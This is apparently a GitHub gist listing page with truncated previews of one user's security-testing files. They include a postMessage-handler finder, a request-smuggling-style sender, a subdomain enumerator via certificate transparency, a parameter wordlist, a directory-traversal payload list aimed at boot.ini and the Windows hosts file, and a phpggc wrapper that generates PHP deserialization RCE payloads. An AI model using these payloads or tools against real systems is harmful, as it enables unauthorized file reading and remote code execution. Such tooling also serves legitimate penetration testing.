This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<body> | |
<div id="email-container"></div> | |
<script> | |
window.addEventListener("message", function(event) { | |
console.log(event.data) | |
if (event.data && event.data.from && event.data.from == "summery") { | |
const data = JSON.parse(event.data.emails); | |
const emails = data; | |
const emailContainer = document.getElementById('email-container'); | |
if (Array.isArray(emails) && emails.length > 1) { |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from playwright.async_api import async_playwright | |
import asyncio, json, hashlib, sys | |
init_script = """ | |
// Override addEventListener to detect 'message' handlers | |
const originalAddEventListener = window.addEventListener; | |
window.addEventListener = function(type, listener, options){ | |
if (typeof type == 'string' && type.toLowerCase() === 'message'){ | |
const stack = new Error(); | |
const stacker = stack.stack.split('\\n'); |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
{} |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
chars = "abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ" | |
class Found: | |
def __init__(self): | |
self.found = "" | |
self.is_stop = False | |
self.is_found = False | |
def set(self, value): | |
self.found = value |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from requests import Request, Session | |
import requests | |
import sys | |
import logging | |
from urllib.parse import urlparse | |
import time | |
from concurrent.futures import ThreadPoolExecutor, as_completed | |
logging.basicConfig(level=logging.DEBUG) | |
def sendRequest(req,con,smg,lens): |
This file has been truncated, but you can view the full file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66boot.ini | |
%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66windows%%32%%66system32%%32%%66drivers%%32%%66etc%%32%%66hosts | |
%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66%%c0%6e%c0%6e%%32%%66windows |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
id | |
action | |
page | |
name | |
password | |
url | |
type | |
username | |
file |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
#usage | |
# bash color.sh "{{red}}hello {{blue}}marcos" # singel color | |
# bash color.sh "{{red}}hello [start]{{red}}how are you[end]" | |
text="" | |
args="$@" | |
declare -A colors=(\ | |
["{{reset}}"]="\\\033[0m" \ |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
googleCT (){ | |
target=${target} | |
url="https://transparencyreport.google.com/transparencyreport/api/v3/httpsreport/ct/certsearch?include_subdomains=true&domain=${target}" | |
dataF=$(curl -s ${url} | sed "s/)]}'//g") | |
id=$(echo ${dataF} | sed "s/)]}'//g"| jq -r '.[][3][1]') | |
range=$(echo $dataF | jq -r '.[][-1][-1]') | |
declare -a links | |
links=($(echo ${dataF} | jq -r '.[][1][][5]')) | |
echo '=============================================' 1>&2 | |
echo '| start 1 |' 1>&2 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# phpggc wrapper that automatically generates payloads for RCE gadgets | |
SCRIPT_DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" &> /dev/null && pwd )" | |
if [[ ! -d SCRIPT_DIR/phpggc ]] | |
then | |
git clone https://github.com/ambionics/phpggc ${SCRIPT_DIR}/phpggc | |
fi | |
function="system" |
NewerOlder